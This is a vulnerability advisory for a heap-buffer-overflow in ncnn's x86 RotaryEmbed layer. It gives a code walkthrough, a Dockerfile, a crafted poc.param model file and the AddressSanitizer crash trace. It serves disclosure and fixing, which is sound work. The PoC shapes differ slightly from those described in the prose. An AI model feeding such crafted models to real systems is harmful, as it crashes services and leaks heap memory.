RotaryEmbed Cache Heap Buffer Overflow
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/rotaryembed_x86.cpp:247 in RotaryEmbed_x86::forward
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted model whose cosine/sine cache tensors are shorter than the query sequence makes the x86 RotaryEmbed layer walk row pointers past the end of both cache allocations, aborting ncnnoptimize and otherwise mixing adjacent heap bytes into the rotated output. The attacker supplies only a .param file; ncnnoptimize inparam inbin outparam outbin 0 materializes each declared Input shape in ModelWriter::shape_inference() and executes the layer. Any Net-based inference on an untrusted model reaches the same code.
Detail
RotaryEmbed_x86::forward takes the sequence length from the data tensor (bottom_blob.h) and uses it to index the two cache tensors, which are independent bottom blobs with independently declared shapes. There is no comparison of seqlen against cos_cache.h/sin_cache.h, and Mat::row is pure pointer arithmetic ((unsigned char*)data + (size_t)w * y * elemsize) with no range check:
// src/layer/x86/rotaryembed_x86.cpp:40
const Mat& bottom_blob = bottom_blobs[0];
const Mat& cos_cache = bottom_blobs[1];
const Mat& sin_cache = bottom_blobs[2];
const int embed_dim = bottom_blob.w;
const int seqlen = bottom_blob.h;
const int num_heads = bottom_blob.c;
// src/layer/x86/rotaryembed_x86.cpp:59
for (int i = 0; i < seqlen; i++)
{
if (interleaved)
{
const float* ptr = head.row(i);
const float* cos_ptr = cos_cache.row(i);
const float* sin_ptr = sin_cache.row(i);
// src/layer/x86/rotaryembed_x86.cpp:243
for (; j + 1 < embed_dim / 2; j += 2)
{
__m128 a = _mm_loadu_ps(ptr);
__m128 c01 = _mm_castsi128_ps(_mm_loadl_epi64((const __m128i*)cos_ptr));
__m128 s01 = _mm_castsi128_ps(_mm_loadl_epi64((const __m128i*)sin_ptr));
The PoC declares Input bottom 0 1 bottom 0=4 1=100 2=1, so embed_dim = 4, seqlen = 100, num_heads = 1, and Input cos 0 1 cos 0=2 1=1 / Input sin 0 1 sin 0=2 1=1, i.e. caches with a single row of two floats each. RotaryEmbed rot 3 1 bottom cos sin out 0=1 selects the interleaved path.
The row loop runs 100 times against caches that hold one row, so cos_cache.row(i) walks forward by w * elemsize = 8 bytes per iteration with no upper bound. embed_dim / 2 == 2, so the wide AVX-512/AVX2/SSE loops are skipped and the two-element tail loop at line 243 runs once per row, issuing an 8-byte _mm_loadl_epi64 at cos_ptr. The cache's backing allocation is 84 bytes (padded payload plus refcount plus the 64-byte NCNN_MALLOC_OVERREAD slack), so iteration i = 10 loads bytes 80..87 and crosses the end at offset 84 — the READ of size 8 ... 0 bytes after 84-byte region in the report. The remaining 89 iterations would read progressively further, up to ~800 bytes past the buffer.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-rotaryembed-cache-heap-buffer-overflow && cd ncnn-poc-rotaryembed-cache-heap-buffer-overflow
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'POC_PARAM'
7767517
4 4
Input bottom 0 1 bottom 0=4 1=11
Input cos 0 1 cos 0=2
Input sin 0 1 sin 0=2
RotaryEmbed rot 3 1 bottom cos sin out 0=1
POC_PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000090 at pc 0x59fccd5e0af9 bp 0x7ffe2c8326b0 sp 0x7ffe2c8326a0
READ of size 8 at 0x50e000000090 thread T0
#0 0x59fccd5e0af8 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/emmintrin.h:712
#1 0x59fccd5e0af8 in ncnn::RotaryEmbed_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/rotaryembed_x86_avx512.cpp:247
#2 0x59fcc46a470b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#3 0x59fcc468cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#4 0x59fcc46ec9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#5 0x59fcc457e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#6 0x59fcc45fbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#7 0x7985574e41c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x7985574e428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x59fcc457b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000094 is located 0 bytes after 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
#0 0x798557b5df1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x59fcc464abc5 in fastMalloc /ncnn/src/allocator.h:62
#2 0x59fcc464abc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
#3 0x59fcc457cc3b in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:388
#4 0x59fcc45fbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#5 0x7985574e41c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x7985574e428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x59fcc457b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/emmintrin.h:712 in _mm_loadl_epi64(long long __vector(2) const*)
Credit
Zheng Yu @ DepthFirst